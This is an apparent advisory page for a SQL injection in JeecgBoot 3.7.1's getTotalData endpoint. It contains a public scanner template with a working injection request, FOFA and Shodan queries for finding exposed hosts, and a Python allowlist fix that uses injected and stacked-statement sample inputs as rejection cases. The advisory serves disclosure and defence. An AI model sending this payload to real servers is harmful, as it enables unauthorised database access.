CVE-2024-48307: JeecgBoot v3.7.1 - SQL Injection

Date: 2025-08-01 | Affected software: JeecgBoot | PoC: public

Vulnerability description

The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.

PoC code [public]

id: CVE-2024-48307

info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.89515
    epss-percentile: 0.99533
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli,vkev

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

    payloads:
      path:
        - /jeecg-boot/
        - /

    attack: batteringram
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502203e44e631fad9ad3b7cbfefab2a06b5405bd04ca15f4a7baba6130dfb34a7c8ff02210095cc2fea02bb22fc6f29730d34d8a9a4baab849eb7c1b125ff6a9bbd11c0f463:922c64590222798bb761d5b6d8e72950
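The remediation note in the template says to validate input and use parameterized queries. The weak spot in this class of bug is that the injected value is a column name, and SQL identifiers cannot be bound as parameters, so the fix has to be an allowlist of table and column names checked against the schema before the query is built, with ordinary values still bound. The following Python is an added illustration of that pattern and is not JeecgBoot's code; the `ALLOWED_COLUMNS` table, the `sys_user` sample rows and the sample request bodies are constructed here (the second body reuses the expression carried by the template above as a case the check must reject).

```python
import re
import sqlite3

# Shape check for a bare SQL identifier: letters, digits, underscore, no
# parentheses, quotes, commas or whitespace.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

# Allowlist of tables/columns that the report endpoint may expose. Constructed
# for this example; a real service would derive it from the schema catalogue.
ALLOWED_COLUMNS = {
    "sys_user": {"id", "username", "realname", "status"},
}

# Constructed sample request bodies in the shape of the getTotalData payload.
SAMPLE_REQUESTS = [
    {"tableName": "sys_user",
     "name": [{"fieldName": "id"}, {"fieldName": "username"}]},
    # Expression in place of a column name (taken from the template above).
    {"tableName": "sys_user",
     "name": [{"fieldName": "concat(md5(999999999),0x3a,0x3a)"},
              {"fieldName": "id"}]},
    # Stacked statement in place of a table name.
    {"tableName": "sys_user; drop table sys_user",
     "name": [{"fieldName": "id"}]},
]


class InvalidIdentifier(ValueError):
    """Raised when a caller-supplied table or column name is not allowlisted."""


def table_ok(table):
    return bool(IDENT_RE.match(table)) and table in ALLOWED_COLUMNS


def column_ok(table, column):
    return bool(IDENT_RE.match(column)) and column in ALLOWED_COLUMNS[table]


def rejected_identifiers(request):
    """Audit helper: every identifier in the body that the allowlist rejects."""
    table = request["tableName"]
    if not table_ok(table):
        return [table]
    return [f["fieldName"] for f in request["name"]
            if not column_ok(table, f["fieldName"])]


def build_total_query(request):
    """Build the SELECT only from allowlisted identifiers; values stay bound."""
    bad = rejected_identifiers(request)
    if bad:
        raise InvalidIdentifier(f"rejected identifiers: {bad!r}")
    table = request["tableName"]
    select_list = ", ".join(f'"{f["fieldName"]}"' for f in request["name"])
    # The status filter is a bound parameter (?), never interpolated.
    return f'SELECT {select_list} FROM "{table}" WHERE "status" = ?'


def demo_db():
    """In-memory SQLite with a constructed sys_user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (id TEXT, username TEXT, "
                 "realname TEXT, status INTEGER)")
    conn.executemany("INSERT INTO sys_user VALUES (?, ?, ?, ?)", [
        ("u1", "admin", "Administrator", 1),
        ("u2", "auditor", "Audit User", 1),
        ("u3", "olduser", "Disabled User", 0),
    ])
    return conn


def run_total(conn, request, status):
    """Validate, build and execute the query with the filter value bound."""
    return conn.execute(build_total_query(request), (status,)).fetchall()


if __name__ == "__main__":
    conn = demo_db()
    print(run_total(conn, SAMPLE_REQUESTS[0], 1))
    for req in SAMPLE_REQUESTS[1:]:
        print("rejected:", rejected_identifiers(req))
```

The same `rejected_identifiers` check can run over logged request bodies as a detection: any `getTotalData` body whose `fieldName` or `tableName` values fail the identifier shape check is worth an alert, since legitimate clients only ever send bare column names.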
